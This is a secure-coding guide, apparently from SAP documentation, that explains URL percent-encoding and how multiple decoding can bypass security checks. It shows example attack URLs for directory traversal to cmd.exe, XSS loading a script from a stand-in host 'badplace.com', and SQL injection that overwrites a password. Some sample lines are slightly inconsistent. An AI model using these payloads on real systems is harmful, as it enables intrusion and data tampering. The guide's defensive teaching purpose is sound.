In technical literature, URL encoding, UTF encoding, escape-encoding, percent-encoding, and Web encoding are used interchangeably. To obtain a better understanding of malicious attacks such as XSS or SQL injection attacks, you need to gain an insight into URL encoding techniques.
Web applications transfer data between the client and the server using the HTTP or HTTPS protocols. Normally, all user input may be passed to the server either in the HTTP headers (submitted through the cookie field, or the post data field) or included in the query portion of the requested URL. If the data is transferred by a URL, it has to be specially encoded to obey the proper syntax rules of URLs.
The standard (RFC2396) distinguishes between two types of character class:
Characters from the reserved class could conflict with the correct interpretation of a URL. Escape-encoding allows the correct syntax interpretation of these reserved characters. The URL encoding is achieved by a triplet sequence consisting of a percentage character (%) followed by the two hexadecimal digits representing the octet code of the original character.
The percentage character acts as the escape indicator within a URL and therefore has to be escaped itself as "%25" in order to be used as data in an URL. For URI encoding, we recommend that you ensure that you do not escape or un-escape the same string more than once, since un-escaping an already un-escaped string might lead to the misinterpretation of a percentage data character as another escaped character, or the converse in the case of escaping an already escaped string.
Multiple escape-encoding at different layers of an application may circumvent security checks during the initial decoding pass. An example of a multiple escape-encoding of this type is shown below using the character sequence "\" or "..\".
The backslash "\" can be described as "%5c" or the following permutations:
These different escape-encoding sequences give an example of possible entry points for URL attacks, such as:
URL Attack as a Multiple Decoding Attack
Example URL Attack
http://TARGET/scripts/..%255c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
Attack Result
The directory list of C:\ is revealed.
URL Attack as an XSS Attack
Example URL Attack
http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.bad place.com%2fnasty.js%22%3e%3c%2fscript%3e
Attack Result
<script src="http://www.badplace.com/nasty.js"></script>
URL Attack as an SQL Injection Attack
Example URL Attack
http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20 passwd%3d%270wn3d%27%3b--%00
Attack Result
Executed database query:
SELECT preferences FROM logintable WHERE userid='bob' update logintable set password='0wn3d'
Useful Hint:
There is a reference table of ASCII characters in URL encoding form (hexadecimal format) at www.w3schools.com/tags/ref_urlencode.asp .
For Web Dynpro for Java:
Due to the architecture of Web Dynpro, automatic integration of output encoding functionality is available. Therefore, you do not need to manually implement additional output encoding functionality.
The different character encoding schemes and their variety of application offer an infinite number of malicious encodings. The developer is therefore responsible for securing his or her application against encoding attacks of this type, in accordance with the following rules:
Always restrict the type of acceptable data as much as possible using strict validation rules.